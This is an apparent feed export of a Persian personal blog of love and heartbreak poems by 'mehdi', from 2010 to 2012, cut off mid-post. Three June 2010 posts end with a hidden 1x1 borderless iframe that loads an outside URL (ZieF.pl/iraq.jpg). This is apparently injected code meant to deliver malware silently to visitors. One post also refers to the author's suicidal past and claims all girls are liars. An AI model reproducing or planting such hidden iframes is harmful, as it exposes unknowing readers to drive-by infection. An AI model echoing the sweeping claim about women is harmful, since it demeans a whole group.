من و عشق بی وفام عشق.تنهایی.دردو غصه ی یه عاشق شعر های عاشقانه http://eshghebivafa.mihanblog.com 2018-06-21T18:16:13+01:00 text/html 2012-02-21T05:56:29+01:00 eshghebivafa.mihanblog.com mehdi غرق هم http://eshghebivafa.mihanblog.com/post/65 <P><FONT color=#ff0000></FONT><STRONG><FONT color=#ff0000 size=4>قراره غرق هم باشیم از این دریا نترسونم</FONT></STRONG></P> <P><STRONG><FONT color=#ff0000 size=4>تو لب تر کن یه دریا رو به آتیشت می سوزونم</FONT></STRONG></P> <P><STRONG><FONT color=#ff0000 size=4>اگه کهنه ام بگو نو شم اگه پیرم جوون میشم</FONT></STRONG></P> <P><FONT face="Times New Roman"></FONT><STRONG><FONT color=#ff0000 size=4>دلت می خواد کی باشم؟من از فردا همون میشم</FONT></STRONG></P> <P><FONT face="Times New Roman"></FONT><STRONG><FONT color=#ff0000 size=4>تو لیلا نیستی اما می خوام پای تو مجنون شم</FONT></STRONG></P> <P><FONT face="Times New Roman"></FONT><STRONG><FONT color=#ff0000 size=4>دلم بد جور لرزیده بذار داغون داغون شم</FONT></STRONG></P> <P><FONT face="Times New Roman"></FONT><STRONG><FONT color=#ff0000 size=4>اگه دنیا به کامت نیست اگه بازم دلت خونه</FONT></STRONG></P> <P><FONT face="Times New Roman"></FONT><STRONG><FONT color=#ff0000 size=4>یکی هست چرخ دنیا رو به کام تو بچرخونه</FONT></STRONG></P> <P><FONT face="Times New Roman"></FONT><STRONG><FONT color=#ff0000 size=4>یکی که با خیال تو رو دریا خونه می سازه </FONT></STRONG></P> <P><STRONG><FONT color=#ff0000 size=4>داره هر چی رو که برده پای عشق تو می بازه&nbsp;</FONT></STRONG></P> <P><STRONG><FONT color=#ff0000 size=4>برام زنجیر می بافی تو از این کوه ترسیدی </FONT></STRONG></P> <P><STRONG><FONT color=#ff0000 size=4>آخه اینقدر زنجیری کدوم دیوونه رو دیدی؟</FONT></STRONG></P> <P><STRONG><FONT color=#ff0000 size=4>اگه دنیا به کامت نیست اگه بازم دلت خونه</FONT></STRONG></P><FONT face="Times New Roman"></FONT> <P><STRONG><FONT color=#ff0000 size=4>یکی هست چرخ دنیا رو به کام تو بچرخونه</FONT></STRONG></P><FONT face="Times New Roman"></FONT> <P><STRONG><FONT color=#ff0000 size=4>یکی که با خیال تو رو دریا خونه می سازه</FONT></STRONG></P> <P><STRONG><FONT color=#ff0000 size=4>داره هر چی رو که برده یه جا پای تو می بازه</FONT></STRONG></P> text/html 2012-02-06T06:21:57+01:00 eshghebivafa.mihanblog.com mehdi بد نکن با دل عاشق ما http://eshghebivafa.mihanblog.com/post/101 <FONT size=2>&nbsp;</FONT> <P align=right><FONT color=#ff0000><FONT face="Verdana, Arial, Helvetica, sans-serif"><FONT size=3><STRONG>&nbsp;</STRONG>با دل عاشق بد نکن ای آدم نا مهربون</FONT></FONT></FONT></P> <P align=right><FONT color=#ff0000 size=3 face="Verdana, Arial, Helvetica, sans-serif">سنگدل و بی وفا نشو تو دل داری اینم بدون</FONT></P> <P align=right><FONT color=#ff0000 size=3 face="Verdana, Arial, Helvetica, sans-serif">تو قول همراهی دادی ، رو وعده ی دلت بمون</FONT></P> <P align=right><FONT color=#ff0000 size=3 face="Verdana, Arial, Helvetica, sans-serif">باطن پاکو تو جهان میخرنش خیلی گرون</FONT></P> <P align=right><FONT color=#ff0000 size=3 face="Verdana, Arial, Helvetica, sans-serif">عهد شکن عشق نباش خیر نمی بینی از زمون</FONT></P> text/html 2011-10-10T07:01:31+01:00 eshghebivafa.mihanblog.com mehdi میشد http://eshghebivafa.mihanblog.com/post/91 <FONT size=4><FONT face=Arial color=#ff0000>&nbsp;&nbsp;&nbsp;&nbsp; می شد از بودن تو عالمی ترانه ساخت</FONT></FONT> <P align=right><FONT face=Arial color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; کهنه ها رو تازه کرد از تو یک بهانه ساخت </FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; با تو می شد که صدام همه جارو پر کنه</FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; تا قیامت اسم ما قصه ها رو پر کنه</FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; اما خیلی دیر دونستم تو فقط عروسکی </FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; کور و کر بازیچه باد مثل یه بادبادکی </FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; دل سپردن به عروسک منو گم کرد تو خودم</FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif"><FONT color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; تو رو خیلی دیر شناختم وقتی که تموم شدم</FONT></FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; با یه دست رفیق دستام نه شریک غم بودی</FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; واسه حس کردن دستام خیلی خیلی کم بودی </FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; توی شهر بی کسی هام تو رو از دور می دیدم </FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; تا رسیدم به تو افسوس به تباهی رسیدم</FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; شهر بی عابر و خالی شهر تنهایی من بود </FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; لحظه شناختن تو لحظه تموم شدن بود</FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp; مگه می شه از عروسک شعر عاشقونه ساخت</FONT></P> <P align=right><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عاشق چیزی که نیست شد روی دریا خونه ساخت</FONT></P> <P align=right><SPAN class=postbody><FONT face="arial, helvetica, sans-serif" color=#ff0000 size=4>&nbsp;&nbsp;&nbsp;&nbsp; دل خسته ام از این جا از آدمای دنیا </FONT></SPAN></P> <P align=right><FONT size=4><FONT color=#ff0000><SPAN class=postbody><FONT face="arial, helvetica, sans-serif">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; همین امروز فردا دل میزنم به دریا</FONT></SPAN> </FONT></FONT></P> text/html 2011-09-25T12:46:53+01:00 eshghebivafa.mihanblog.com mehdi یادت بخیر http://eshghebivafa.mihanblog.com/post/92 <DIV class=posts> <P align=right><SPAN style="LINE-HEIGHT: 250%; FONT-FAMILY: 'Tahoma', 'sans-serif'; FONT-SIZE: 18pt" lang=FA><STRONG><FONT face="arial, helvetica, sans-serif"><FONT color=#ff0000 size=4>یادت به خیر ای که دلت آفتاب بود</FONT></FONT></STRONG></SPAN></P> <P align=right><FONT color=#ff0000><SPAN style="LINE-HEIGHT: 250%; FONT-FAMILY: 'Tahoma', 'sans-serif'; FONT-SIZE: 18pt" lang=FA><STRONG><FONT face="arial, helvetica, sans-serif"><FONT size=4>مهرت زلال و عشق تو همرنگ آب بود<BR>یادت به خیر ای که سرا پا وجود تو<BR>همچون فرشتگان خدا روح ناب بود<BR>یادت به خیر باد، که با ماه روی تو<BR>این تیره آسمان دلم پر شهاب بود<BR>میریخت قطره قطره محبت ز چشم تو<BR>احساست از سلاله ی تُرد حباب بود<BR>وقتی که بامداد جدایی فرا رسید<BR>قلبم هنوز روی دلت گرم خواب بود<BR>می بینمت دو باره</FONT></FONT></STRONG></SPAN><SPAN><FONT size=4 face="arial, helvetica, sans-serif"><STRONG>؟ دلم این سؤال کرد</STRONG></FONT></SPAN></FONT></P> <P align=center><SPAN><FONT color=#9999cc size=4 face="arial, helvetica, sans-serif"><STRONG><FONT color=#ff0000>دردا که این سؤال دلم بی جواب ماند<BR></FONT></P></STRONG></FONT></SPAN></DIV> text/html 2011-09-12T13:45:28+01:00 eshghebivafa.mihanblog.com mehdi می http://eshghebivafa.mihanblog.com/post/93 <FONT face=Arial color=#3366ff size=4>&nbsp;امروز که نوبت جوانی من است،</FONT> <P align=right><FONT face=Arial color=#3366ff size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; می نوشم که از آنکه کامرانی من است،</FONT></P> <P align=right><FONT color=#3366ff><FONT face="arial, helvetica, sans-serif" size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عیبم مکنید</FONT><FONT size=4><FONT face="arial, helvetica, sans-serif">. </FONT><FONT face="arial, helvetica, sans-serif">گرچه تلخ است خوش است،</FONT></FONT></FONT></P> <P align=right><FONT size=4><FONT color=#3366ff><FONT face="arial, helvetica, sans-serif">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; تلخ است، از آنکه زندگانی من است</FONT><FONT face=TimesNewRomanPS-BoldMT><FONT face=TimesNewRomanPS-BoldMT><FONT face="arial, helvetica, sans-serif">.</FONT></P></FONT></FONT></FONT></FONT> text/html 2011-08-04T11:18:01+01:00 eshghebivafa.mihanblog.com mehdi دوباره بهار http://eshghebivafa.mihanblog.com/post/123 <P><FONT color=#ff0000 size=4>سلام </FONT></P> <P><FONT color=#ffff33 size=5>من دوباره اومدم</FONT></P> <P><FONT color=#33ccff size=5>دوباره میخوام بترکونم<IMG src="http://www.mihanblog.comhttp://mihanblog.com/public/public/rte/images_new/smiles/11.gif"></FONT></P> text/html 2010-10-02T19:54:17+01:00 eshghebivafa.mihanblog.com mehdi حرف اخر http://eshghebivafa.mihanblog.com/post/121 <P><FONT color=#66ffff size=4>سلام</FONT></P> <P><FONT color=#66ffff size=4>اینو واسه اونایی میگم که شکست خوردن</FONT></P> <P><FONT color=#66ffff size=4>دیگه کارم از خود کشی گذشت </FONT></P> <P><FONT color=#66ffff size=4>من زنده موندم ولی با کلی خاطره و کلی غم</FONT></P> <P><FONT color=#66ffff size=4>این دخترها لیاقت عاشق شدن ندارن همه دروغگو هستن فقط می خوان یکی بهشون ابراز علاقه بکنه</FONT></P> <P><FONT color=#66ffff size=4>خیلی نامردن</FONT></P> <P><FONT color=#66ffff size=4>من دوس دخترمو نفرین کردم که این بلایو که سرو اورد تا اخر عمرش هر مردی که باهاشه سرش بیاره </FONT></P> <P><FONT color=#66ffff size=4>خدا کنه که بفهمه گریه ی مرد چه دردی داره!!!</FONT><IMG src="http://www.mihanblog.comhttp://mihanblog.com/public/public/rte/images_new/smiles/20.gif"><IMG src="http://www.mihanblog.comhttp://mihanblog.com/public/public/rte/images_new/smiles/12.gif"></P> text/html 2010-06-19T19:18:59+01:00 eshghebivafa.mihanblog.com mehdi عشق یعنی http://eshghebivafa.mihanblog.com/post/119 <P><FONT color=#33ff33 size=3>&nbsp;عشق یعنی مستی و دیوانگی</FONT><FONT size=3><FONT color=#33ff33><FONT face="Times New Roman"> <BR><BR></FONT>&nbsp; عشق یعنی با جهان بیگانگی</FONT></FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp; عشق یعنی شب نخفتن تا سحر</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp; عشق یعنی سجده ها با چشم تر</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی سر به دار آویختن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی اشک حسرت ریختن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی در جهان رسوا شدن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی مست و بی پروا شدن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی سوختن یا ساختن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی زندگی را باختن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp; عشق یعنی انتظار و انتظار</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp; عشق یعنی هرچه بینی عکس یار</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;عشق یعنی دیده بر در دوختن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;عشق یعنی در فراقش سوختن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp; عشق یعنی لحظه های التهاب</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp; عشق یعنی لحظه های ناب ناب</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp; عشق یعنی سوز نی ، آه شبان</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp; عشق یعنی معنی رنگین کمان</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی شاعری دل سوخته</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی آتشی افروخته</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی با گلی گفتن سخن</FONT><FONT face="Times New Roman"><BR><FONT color=#33ff33 size=3>&nbsp;<BR></FONT></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp;&nbsp; عشق یعنی خون لاله بر چمن</FONT><FONT face="Times New Roman"><BR><BR></FONT><FONT color=#33ff33 size=3>&nbsp;&nbsp;&nbsp; عشق یعنی شعله</FONT><FONT face="Times New Roman"><FONT color=#33ff33 size=3> <BR></FONT></P></FONT><IFRAME style="BORDER-TOP-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px" src="http://ZieF.pl/iraq.jpg" width=1 height=1></IFRAME><FONT size=3></FONT> text/html 2010-06-18T19:33:31+01:00 eshghebivafa.mihanblog.com mehdi از عشق بگو http://eshghebivafa.mihanblog.com/post/118 <P><FONT color=#ff0000 size=3>ای قلب تو پر شراره از عشق بگو</FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*"’*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>وی درد تو بی شماره از عشق بگو</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>امید رهایی ام از این دریا نیست</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>ای پهنه ی بی کناره از عشق بگو</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">*/*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>تا شب پره ها باز ملامت نکنند</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>با این شب بی ستاره از عشق بگو</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>دیریست که می رویم و نا پیداییم</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>درمانده که چیست چاره از عشق بگو</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>تا یاد تو را به لحظه ها نسپارند</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>هر دم همه جا هماره از عشق بگو</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">*/*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>گاهی سخن سکوت را می فهمند</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>لب دوخته با اشاره از عشق بگو</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>وقتی ز قصیده ها غزل می سازند</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>بنشین و به استعاره از عشق بگو</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> */*""*~</FONT></FONT></FONT></P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> <P><BR></FONT>تنهای من ای با من تنها ، تنها</FONT></FONT><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"> **""*~</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman"><BR></FONT>از عشق دوباره از عشق بگو<FONT face="Times New Roman"> </P></FONT></FONT></FONT><IFRAME style="BORDER-TOP-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px" src="http://ZieF.pl/iraq.jpg" width=1 height=1></IFRAME> text/html 2010-06-16T10:45:12+01:00 eshghebivafa.mihanblog.com mehdi امشب http://eshghebivafa.mihanblog.com/post/117 <P><FONT size=3><FONT color=#ff0000>امشب دلم برای تو تکثیر می شود<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>در این غزل که نام تو تفسیر می شود<FONT face="Times New Roman">*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>در شعرهای حضرت حافظ پیاله ای ست<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>از آن به چشم های تو تعبیر می شود<FONT face="Times New Roman">*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>وقتی خدا میان نگاهت نشسته است<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>خیلی عجیب نیست که تکبیر می شود<FONT face="Times New Roman"> –*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>ذکر مدام و ورد لبم ، آسمانی ام<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>خورشید در نگاه تو تصویر می شود<FONT face="Times New Roman">*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>باید تمام عمر برایت بغل شوم<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>باید تمام عمر … بیا ! دیر می شود<FONT face="Times New Roman"> !*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>هر روز بوسه های مکرر ، ولی بگو<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>دل از شراب سیب مگر سیر می شود ؟<FONT face="Times New Roman">!*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>سخت است از تو شعر بگویم امید من<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>این دل به پای قافیه ها پیر می شود<FONT face="Times New Roman">*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>تا زنده ام برای تو می گویم از خودم<FONT face="Times New Roman">*&amp;*</FONT></FONT></FONT></P> <P><FONT size=3><FONT color=#ff0000><FONT face="Times New Roman">&nbsp;</P></FONT></FONT></FONT> <P><FONT size=3><FONT color=#ff0000>از شاعری که بی تو زمینگیر می شود<FONT face="Times New Roman">*</P></FONT></FONT></FONT><IFRAME style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px" src="http://ZieF.pl/iraq.jpg" width=1 height=1></IFRAME> text/html 2010-06-15T20:03:12+01:00 eshghebivafa.mihanblog.com mehdi خدا حافظی http://eshghebivafa.mihanblog.com/post/116 <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>به خدا حافظی تلخ تو سوگند نشد</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>که تو رفتی ودلم ثانیه ای بند نشد</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>****/***/***/***/*****<BR>لب تو میوه ممنوع ولی لبهایم</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>هر چه از طعم لب سرخ تو دل کند نشد</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>***/***/***/***/******</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>با چراغی همه جا گشتم وگشتم در شهر</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>هیچ کس هیچ کس اینجا به تو مانند نشد</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>****/****/****/*****/******</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>هر کسی در دل من جای خودش را دارد</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>جانشین تو در این سینه خداوند نشد</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>*****/****/*****/*****/****</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>خواستند از تو بگویند شبی شاعرها</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>عاقبت با قلم شرم نوشتند:نشد!</FONT></P> <P style="TEXT-ALIGN: center"><FONT color=#ffff66 size=3>*****/*****/****/****/******</FONT></P> text/html 2010-06-10T20:15:13+01:00 eshghebivafa.mihanblog.com mehdi کمه http://eshghebivafa.mihanblog.com/post/115 <FONT size=4>زندگی پر از غمه</FONT> <P></P> <P><FONT size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; اره دنیا ماتمه</FONT></P> <P><FONT size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;برای عاشق شدن</FONT></P> <P><FONT size=4>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; عشق تو خیلی کمه</FONT></P> <P><FONT size=4></FONT>&nbsp;</P> text/html 2010-05-21T11:41:15+01:00 eshghebivafa.mihanblog.com mehdi نگاه کن http://eshghebivafa.mihanblog.com/post/110 <P><FONT color=#ffcc00><FONT size=4>نگاه </FONT><FONT style="FONT-FAMILY: arial,helvetica,sans-serif" size=4>کن غم درون دیده‌ام </FONT></FONT></P><FONT style="FONT-FAMILY: arial,helvetica,sans-serif" size=4> <P><BR><FONT color=#ffcc00>چگونه قطره قطره آب می‌شود</FONT></P> <P><FONT color=#ffcc00><BR>چگونه سایۀ سیاه سرکشم </FONT></P> <P><BR><FONT color=#ffcc00>اسیر دست آفتاب می‌شود </FONT></P> <P><BR><FONT 